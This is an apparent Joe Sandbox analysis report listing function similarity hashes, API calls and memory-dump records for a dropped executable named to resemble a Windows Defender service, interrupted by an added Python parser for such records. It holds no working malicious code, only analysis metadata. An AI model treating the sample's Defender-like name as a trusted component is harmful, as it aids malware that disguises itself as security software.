• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
• Instruction ID: f31014199ecf68acca96ee61937886a509d5e0345af87e4b08f9de6fc53529c9
• Opcode Fuzzy Hash: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
• Instruction Fuzzy Hash: 96216D20F0C212C2FA6E772AB65513DE2526F44BB0FC40B34D97E47ED6DE2CA445A678

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 62d9b5d24e4fb6abcbada70e0530243db7f6cfeb5a7f27f68214560e5305eba5
• Instruction ID: 289697c9d42363896a44eee234fc565b559764adb9ab81bb80ef704e99c53c7a
• Opcode Fuzzy Hash: 62d9b5d24e4fb6abcbada70e0530243db7f6cfeb5a7f27f68214560e5305eba5
• Instruction Fuzzy Hash: C611BE21A18A41C6E754AB12F854329F2A0FB89FE4F804235EA9D83BD4DF7CD444D768

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
• Opcode ID: 0fd29cbb7af6d76dae49e4a1d0baa518f45d08b5763d85ee9fde59cd8831a8bc
• Instruction ID: d328ba5e6180da20ac6f5ea569ee3b2f7f0465e5455f95aa72d888344aba3b1a
• Opcode Fuzzy Hash: 0fd29cbb7af6d76dae49e4a1d0baa518f45d08b5763d85ee9fde59cd8831a8bc
• Instruction Fuzzy Hash: 0D819272A08741C6EB28AF25B440269B3E6FF44BA4F940635EA5D47BD8EF3CD8409734

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2081738530-0
• Opcode ID: f70f61bac27a082725c3e5468bdb31bd3bcc1b36a288abbb61d2fcafcbecc5c5
• Instruction ID: d28cf4b10d440a7496bd3101de7ec544d33e3e2c370faf25c0210c55d77b1573
• Opcode Fuzzy Hash: f70f61bac27a082725c3e5468bdb31bd3bcc1b36a288abbb61d2fcafcbecc5c5
• Instruction Fuzzy Hash: FB315621A08B05C5EA19BB15F8401BAB364FB94B98FD80632DA5D437A5DF3CE441DB39

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
• String ID:
• API String ID: 2324539378-0
• Opcode ID: 5ba330be2dbbb8b3f6702c6a6d1631c6be94a71e4c76cdf28269f1f4d6e0dc4d
• Instruction ID: 91b5d79d2e450212b779f1dbe5be274c59541314754fb4d637f3fbd45e54d6f7
• Opcode Fuzzy Hash: 5ba330be2dbbb8b3f6702c6a6d1631c6be94a71e4c76cdf28269f1f4d6e0dc4d
• Instruction Fuzzy Hash: 2D316422A0CB41C5EA29BB15F44017AB364FB88B94FD80132DA5E873A5DE3CE445DB39
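The entries above are Joe Sandbox's per-function similarity records for the dropped MicrosoftWindowsDefenderCoreService executable; the Opcode ID, Instruction ID and the two fuzzy hashes are what you would compare against another sample's report to find shared code. As an added example (not part of this report or of Joe Sandbox's tooling), here is a small Python parser for the text form of these records, so the hashes and API/string lists can be extracted into structured data and diffed against another report. The sample input is two records copied from this section in the raw form a text export produces (indentation, empty tab labels, the "Download File" link text fused to the dump names); the field names and the helper functions are this example's own choices, not Joe Sandbox's.

```python
import re

# Constructed sample input: two records copied from the report above, in the
# raw form a text export of the page produces (indentation, empty tab labels,
# and the "Download File" link residue fused to the dump names).
SAMPLE = """
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
    • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
    • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
    Similarity
    • API ID: Event$Source$DeregisterErrorLastRegisterReport
    • String ID: %s failed with %d$MicrosoftWindowsDefenderCoreService$MicrosoftWindowsDefenderCoreService
    • API String ID: 544316925-1642833198
    • Opcode ID: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
    • Instruction ID: 502e0b7905e47f9d3276025047dffa26889ecfd6bdff33dca7814adb34993b88
    • Opcode Fuzzy Hash: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
    • Instruction Fuzzy Hash: 4A111F32A08B85C6EB599B10F4553AAB3A0FB8D744F801136EA8D43B54EF7CD154DB24
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
    Similarity
    • API ID: Value$ErrorLast
    • String ID:
    • API String ID: 2506987500-0
    • Opcode ID: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
    • Instruction ID: f31014199ecf68acca96ee61937886a509d5e0345af87e4b08f9de6fc53529c9
    • Opcode Fuzzy Hash: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
    • Instruction Fuzzy Hash: 96216D20F0C212C2FA6E772AB65513DE2526F44BB0FC40B34D97E47ED6DE2CA445A678
"""

RECORD_START = "Memory Dump Source"
TAB_LABELS = {"APIs", "Strings", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
LINK_RESIDUE = "Download File"
# Report label -> key in the parsed record (key names are this example's own).
FIELDS = {"Snapshot File": "snapshot_file", "API ID": "api_id",
          "String ID": "string_id_raw", "Opcode ID": "opcode_id",
          "Instruction ID": "instruction_id", "Opcode Fuzzy Hash": "opcode_fuzzy",
          "Instruction Fuzzy Hash": "instruction_fuzzy"}


def _clean(value):
    """Strip whitespace and the 'Download File' link text fused to dump names."""
    value = value.strip()
    if value.endswith(LINK_RESIDUE):
        value = value[: -len(LINK_RESIDUE)].rstrip()
    return value


def _new_record():
    rec = {key: "" for key in FIELDS.values()}
    rec.update(source_file="", image_base="", based_on_pe=False,
               associated=[], api_hash=0, string_hash=0)
    return rec


def parse_records(text):
    """Parse the text form of Joe Sandbox function entries into a list of dicts."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in TAB_LABELS:
            continue                      # blank line or an empty tab label
        if line == RECORD_START:
            rec = _new_record()
            records.append(rec)
            continue
        m = BULLET.match(line)
        if rec is None or not m:
            continue                      # stray text outside a record
        key, value = m.group(1).strip(), _clean(m.group(2))
        if key == "Source File":
            # "<dump>.sdmp, Offset: <image base>, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            rec["source_file"] = parts[0]
            for p in parts[1:]:
                label, _, v = p.partition(":")
                if label == "Offset":
                    rec["image_base"] = v.strip()
                elif label == "based on PE":
                    rec["based_on_pe"] = v.strip().lower() == "true"
        elif key == "Associated":
            rec["associated"].append(value)
        elif key == "API String ID":
            # Two decimal hashes joined by '-'; the second is 0 when no strings.
            a, _, s = value.partition("-")
            rec["api_hash"], rec["string_hash"] = int(a), int(s)
        elif key in FIELDS:
            rec[FIELDS[key]] = value
    return records


def strings_of(rec):
    """Strings the function references. Joe Sandbox joins them with '$', so a
    literal '$' (as in CONOUT$) cannot be told apart from the separator; use
    rec['string_id_raw'] when the exact text matters."""
    return [s for s in rec["string_id_raw"].split("$") if s]


def find_by_api(records, needle):
    """Records whose API ID word list mentions `needle` (e.g. 'Report')."""
    return [r for r in records if needle in r["api_id"]]


def fuzzy_hash_set(records):
    """Instruction fuzzy hashes, for overlap checks against another report."""
    return {r["instruction_fuzzy"] for r in records if r["instruction_fuzzy"]}
```

Run it against the text export of two reports and intersect `fuzzy_hash_set()` of each to see which functions the samples share; `find_by_api()` is a plain substring match on the API ID word list because the exact rule Joe Sandbox uses to concatenate API name fragments is not documented on the page.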
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 3523768491-393685449
                                                                                                      • Opcode ID: f5169c4f56f61db07aea03b59a458c5f8c9868908afcd53ad126c0150c097e91
                                                                                                      • Instruction ID: ce125ae3f783afecaac464a4ff437510b50bd8d049edb9e366a6e3a43cba3165
                                                                                                      • Opcode Fuzzy Hash: f5169c4f56f61db07aea03b59a458c5f8c9868908afcd53ad126c0150c097e91
                                                                                                      • Instruction Fuzzy Hash: 27E1D332908782CAE718AF74E4843ADB7A2FB44748F944135DE8D57696CF38E982D734
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 00007FF76E1A1F77
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FAD
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FDA
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FEB
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FFC
                                                                                                      • SetLastError.KERNEL32 ref: 00007FF76E1A2017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: a2daba614819bf553a6c31a2763aabdaf180dc8d53e8e840be4aaf8f075131df
                                                                                                      • Instruction ID: d06a21cb30d652915f82647220eabfe4ebbcf9b1f3f30b32db91a9da9d87b491
                                                                                                      • Opcode Fuzzy Hash: a2daba614819bf553a6c31a2763aabdaf180dc8d53e8e840be4aaf8f075131df
                                                                                                      • Instruction Fuzzy Hash: CA115C20B0C252C2FA6C772A765107DE1526F48BB0F940734E97E47FD6DE2CA445E678
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                      • Opcode ID: dfc1825e89eee14596a70879a8abb65736ceb11984c2e4ac4046aaa8f830b525
                                                                                                      • Instruction ID: 5fa868d1bf23078872b38190362d4243c6a03804a001937480df2520f634936c
                                                                                                      • Opcode Fuzzy Hash: dfc1825e89eee14596a70879a8abb65736ceb11984c2e4ac4046aaa8f830b525
                                                                                                      • Instruction Fuzzy Hash: 0541AE22B09B41C9FB18EBB0E4502BD7361AF44748F944534DE4D23A99CF38D51AA379
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: a6a2257ccce73abb0b5de8b17e2571786f334c575c5a99e5c4bf9468e7371670
                                                                                                      • Instruction ID: c0796b405520ae11584e925d78497ff6bd80e9c146a6ac0673af78568d185767
                                                                                                      • Opcode Fuzzy Hash: a6a2257ccce73abb0b5de8b17e2571786f334c575c5a99e5c4bf9468e7371670
                                                                                                      • Instruction Fuzzy Hash: 4AF0C261A08A02C1EA2CAB20F454379A3A1FF48B60F801336DAAE065F4CF2DD544E338
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 50badd6584c0e704502cbde6b854f5239cc82cee7ff32e6050982a3aefd23c99
                                                                                                      • Instruction ID: 74260ca46ae402d16014349469799deab97a92240db1e058103bf721863caaca
                                                                                                      • Opcode Fuzzy Hash: 50badd6584c0e704502cbde6b854f5239cc82cee7ff32e6050982a3aefd23c99
                                                                                                      • Instruction Fuzzy Hash: 77B18122A0A646C1EA6DFF11B58067DE2D6AF44B84F898435DE4D07795DE3CEC42E338
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1087005451-0
                                                                                                      • Opcode ID: 02996f24eed811a7ae1eb20188cd5df9c91460e270f6fb6400a3a26fa3e2ad52
                                                                                                      • Instruction ID: 2da90f6e5f93c8dd070a3119dfe2c59007bff85c45226f72d8abb366710a028a
                                                                                                      • Opcode Fuzzy Hash: 02996f24eed811a7ae1eb20188cd5df9c91460e270f6fb6400a3a26fa3e2ad52
                                                                                                      • Instruction Fuzzy Hash: 5281E523F18B41C9FB14ABA4F4003ED7362AB44798F804236DE6D16BD6EE38A085D364
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: 610bebcc449b3f19ed658dd1d6eba545d4d7d9ef53352e00cb8a10db8b486460
                                                                                                      • Instruction ID: 5852d78f67fec066dab4f8e686d78829a8e9ff6e4cacac7fe679f970f9be9487
                                                                                                      • Opcode Fuzzy Hash: 610bebcc449b3f19ed658dd1d6eba545d4d7d9ef53352e00cb8a10db8b486460
                                                                                                      • Instruction Fuzzy Hash: 7411B662D18A0386F75C3178F85A37584406F64370EC40636F9AE866D7CE9CA5536138
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A204F
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A206E
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A2096
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A20A7
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A20B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 544b57795e900993dc6ab2fe6fc2bfdc604f26172f4c8bd7ba9232aefa530dbf
                                                                                                      • Instruction ID: 495b8b2c7435117b2a3381e1366dd839a7b8f71e8e398b2637ed43e10bf82365
                                                                                                      • Opcode Fuzzy Hash: 544b57795e900993dc6ab2fe6fc2bfdc604f26172f4c8bd7ba9232aefa530dbf
                                                                                                      • Instruction Fuzzy Hash: C9113D20B09212C1FA6C772A765117EE1425F44BB0E944734E97E47ED6DE2CA481E638
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 78af687ee6f1c8bf6cea1a77bb6845e8d8ac8d0a943de4a8e3e7b8bb2f336905
                                                                                                      • Instruction ID: 9530509959ec0e29237eb55241ed3ca2891df44a38e27e865e0d90077e0f8216
                                                                                                      • Opcode Fuzzy Hash: 78af687ee6f1c8bf6cea1a77bb6845e8d8ac8d0a943de4a8e3e7b8bb2f336905
                                                                                                      • Instruction Fuzzy Hash: 3F112E64B08247C1F96C733A74510B9E1415F45B74ED80B34E93E4AED3DE2CB449A679
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: d675548ff260c3428822139b252ea2b8710ba36714038c92574fd4e9350a16da
                                                                                                      • Instruction ID: 1d30a747cbac8ce7805dbdd9fed341556b02683bcc91c04cc3c67b6d08590042
                                                                                                      • Opcode Fuzzy Hash: d675548ff260c3428822139b252ea2b8710ba36714038c92574fd4e9350a16da
